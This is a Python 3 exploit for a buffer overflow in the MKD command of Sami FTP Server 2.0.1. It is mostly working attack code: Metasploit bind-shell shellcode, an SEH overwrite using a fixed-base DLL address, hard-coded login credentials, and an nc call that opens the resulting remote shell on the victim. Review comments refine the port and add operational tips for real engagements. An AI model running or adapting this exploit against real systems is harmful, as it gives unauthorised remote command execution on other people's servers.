Sami FTP 2.0.1 MKD Buffer Overflow (SEH)
Posted on 13 August 2013
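#!/usr/bin/env python3
# Exploit Title: Sami FTP MKD buffer overflow (SEH) + ASLR bypass
# Date: 11 August 2013
# Exploit Author: Christian (Polunchis) Ramirez https://intrusionlabs.org
# Vendor Homepage: http://www.karjasoft.com/old.php
# Version: Sami FTP Server 2.0.1
# Tested on: Windows 7 Home Basic x86, Spanish
# Thanks: To my wife for putting up with my possessions
#
# Description:
# A buffer overflow is triggered when a long MKD command is sent to the
# server and the user views the Log tab.  The overflow clobbers the SEH
# record; the payload is a Metasploit windows/shell_bind_tcp listening on
# TCP 28876, which this script then connects to with nc.
#
# NOTE(review): the listing this was recovered from had its backslash
# escapes stripped ("xdaxcf..." for "\xda\xcf...", "USER polunchis " for
# "USER polunchis\r\n", "Temp mp0.dll" for "Temp\tmp0.dll").  They are
# restored below; verify the payload against fresh msfvenom output before
# relying on it.
#
# Operational caveat: shell_bind_tcp opens an UNAUTHENTICATED listener on
# the target.  Anyone who can reach target:28876 gets that shell, not just
# the operator.  Prefer a reverse payload in a real engagement.
#
# Ported to Python 3: print(), bytes literals, subprocess instead of
# os.system, no bare except, socket closed on every path.

import socket
import subprocess
import sys
import time

# Port the bind shell listens on (baked into the shellcode below).
BIND_PORT = 28876

# msfpayload windows/shell_bind_tcp LPORT=28876 R | \
#   msfencode -a x86 -b '\x00\xff\x0a\x0d\x20\x40' -t c
# \x0a/\x0d would terminate the FTP command line, \x20 would end the MKD
# argument; \x00, \xff and \x40 were excluded by the author as well.
BAD_CHARS = b"\x00\xff\x0a\x0d\x20\x40"

SHELLCODE = (
    b"\xda\xcf\xb8\xba\xb3\x1e\xe7\xd9\x74\x24\xf4\x5a\x33\xc9\xb1"
    b"\x56\x31\x42\x18\x83\xc2\x04\x03\x42\xae\x51\xeb\x1b\x26\x1c"
    b"\x14\xe4\xb6\x7f\x9c\x01\x87\xad\xfa\x42\xb5\x61\x88\x07\x35"
    b"\x09\xdc\xb3\xce\x7f\xc9\xb4\x67\x35\x2f\xfa\x78\xfb\xef\x50"
    b"\xba\x9d\x93\xaa\xee\x7d\xad\x64\xe3\x7c\xea\x99\x0b\x2c\xa3"
    b"\xd6\xb9\xc1\xc0\xab\x01\xe3\x06\xa0\x39\x9b\x23\x77\xcd\x11"
    b"\x2d\xa8\x7d\x2d\x65\x50\xf6\x69\x56\x61\xdb\x69\xaa\x28\x50"
    b"\x59\x58\xab\xb0\x93\xa1\x9d\xfc\x78\x9c\x11\xf1\x81\xd8\x96"
    b"\xe9\xf7\x12\xe5\x94\x0f\xe1\x97\x42\x85\xf4\x30\x01\x3d\xdd"
    b"\xc1\xc6\xd8\x96\xce\xa3\xaf\xf1\xd2\x32\x63\x8a\xef\xbf\x82"
    b"\x5d\x66\xfb\xa0\x79\x22\x58\xc8\xd8\x8e\x0f\xf5\x3b\x76\xf0"
    b"\x53\x37\x95\xe5\xe2\x1a\xf2\xca\xd8\xa4\x02\x44\x6a\xd6\x30"
    b"\xcb\xc0\x70\x79\x84\xce\x87\x7e\xbf\xb7\x18\x81\x3f\xc8\x31"
    b"\x46\x6b\x98\x29\x6f\x13\x73\xaa\x90\xc6\xd4\xfa\x3e\xb8\x94"
    b"\xaa\xfe\x68\x7d\xa1\xf0\x57\x9d\xca\xda\xee\x99\x04\x3e\xa3"
    b"\x4d\x65\xc0\x33\x42\xe0\x26\xd9\x4a\xa5\xf1\x75\xa9\x92\xc9"
    b"\xe2\xd2\xf0\x65\xbb\x44\x4c\x60\x7b\x6a\x4d\xa6\x28\xc7\xe5"
    b"\x21\xba\x0b\x32\x53\xbd\x01\x12\x1a\x86\xc2\xe8\x72\x45\x72"
    b"\xec\x5e\x3d\x17\x7f\x05\xbd\x5e\x9c\x92\xea\x37\x52\xeb\x7e"
    b"\xaa\xcd\x45\x9c\x37\x8b\xae\x24\xec\x68\x30\xa5\x61\xd4\x16"
    b"\xb5\xbf\xd5\x12\xe1\x6f\x80\xcc\x5f\xd6\x7a\xbf\x09\x80\xd1"
    b"\x69\xdd\x55\x1a\xaa\x9b\x59\x77\x5c\x43\xeb\x2e\x19\x7c\xc4"
    b"\xa6\xad\x05\x38\x57\x51\xdc\xf8\x67\x18\x7c\xa8\xef\xc5\x15"
    b"\xe8\x6d\xf6\xc0\x2f\x88\x75\xe0\xcf\x6f\x65\x81\xca\x34\x21"
    b"\x7a\xa7\x25\xc4\x7c\x14\x45\xcd"
)

# SEH record (next-SEH pointer, then handler) is overwritten at offset 468.
SEH_OFFSET = 468

# Next-SEH slot: jmp short +6 ; nop ; nop -- hops over the handler address
# into the bytes that follow it.
JMP_SHORT = b"\xeb\x06\x90\x90"

# Handler slot: pop/pop/ret at 0x10022689 in
# C:\Program Files\PMSystem\Temp\tmp0.dll (little-endian).  The author calls
# this address "universal": the module is loaded at a fixed base, which is
# the whole ASLR "bypass" -- nothing is leaked or brute-forced.
POP_POP_RET = b"\x89\x26\x02\x10"

# add esp, 0xfffff448 (esp -= 0xbb8).  Moves the stack pointer away from
# the payload so the shellcode's own pushes don't overwrite it.  NOTE: this
# stub contains \xff, which is in the encoder's bad-char list; the author
# reports success, so the server evidently passes it through unmodified.
# Confirm before porting to another build or transport.
FIX_STACK = b"\x81\xc4\x48\xf4\xff\xff"


def build_payload():
    """Return the MKD argument: filler, SEH overwrite, stack fix, shellcode.

    Layout (offsets in bytes):
        0..467   'A' filler
        468..471 next-SEH  -> JMP_SHORT
        472..475 handler   -> POP_POP_RET
        476..481 FIX_STACK
        482..    SHELLCODE
    """
    return b"A" * SEH_OFFSET + JMP_SHORT + POP_POP_RET + FIX_STACK + SHELLCODE


def send_exploit(target, port, payload, timeout=10.0):
    """Log in as polunchis/polunchis and send the overflowing MKD.

    Args:
        target:  host name or IP of the Sami FTP server.
        port:    FTP control port.
        payload: bytes to use as the MKD argument (see build_payload()).
        timeout: per-operation socket timeout in seconds, so a silent
                 server cannot hang the script forever.

    Returns:
        The server's reply to MKD as bytes, or b"" if no reply arrived
        before the timeout (the server may already be down, or may only
        fault once the Log tab is viewed).

    Raises:
        OSError (including socket.timeout) if the connection or the login
        exchange fails.  The socket is closed on every path.
    """
    with socket.create_connection((target, port), timeout=timeout) as s:
        s.recv(1024)  # banner
        s.sendall(b"USER polunchis\r\n")
        s.recv(1024)
        s.sendall(b"PASS polunchis\r\n")
        s.recv(1024)
        # sendall, not send: the MKD line is ~850 bytes and a short send
        # would truncate the SEH overwrite.
        s.sendall(b"MKD " + payload + b"\r\n")
        print("[+] Sending payload of size", len(payload))
        try:
            return s.recv(1024)
        except socket.timeout:
            return b""


def main(argv=None):
    """Entry point: parse <ip> <port>, fire the exploit, then nc to the bind shell."""
    argv = sys.argv if argv is None else argv
    if len(argv) != 3:
        print("[*] Uso: %s <Ip Victima> <Puerto> " % argv[0])
        print("[*] Exploit created by Polunchis")
        print("[*] https://www.intrusionlabs.org")
        sys.exit(0)

    target = argv[1]
    try:
        port = int(argv[2])
    except ValueError:
        sys.exit("[-] Port must be an integer, got %r" % argv[2])

    payload = build_payload()
    print("[+] Connect to %s on port %d" % (target, port))
    try:
        reply = send_exploit(target, port, payload)
    except OSError as exc:
        # Original reported a hard-coded ":21" and swallowed the cause.
        print("[-] Could not connect to %s:%d (%s)" % (target, port, exc))
        sys.exit(1)

    print(reply.decode("latin-1", "replace").rstrip())
    print("[+] Exploit Sent Successfully")
    print("[+] Waiting for 5 sec before spawning shell to %s:%d " % (target, BIND_PORT))
    print(" ")
    time.sleep(5)
    # Argument list, no shell: the target string never reaches a shell parser.
    try:
        subprocess.call(["nc", "-n", target, str(BIND_PORT)])
    except OSError as exc:
        print("[-] Could not run nc (%s); connect manually: nc -n %s %d"
              % (exc, target, BIND_PORT))
        sys.exit(1)
    print("[-] Connection lost from %s:%d " % (target, BIND_PORT))


if __name__ == "__main__":
    main()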
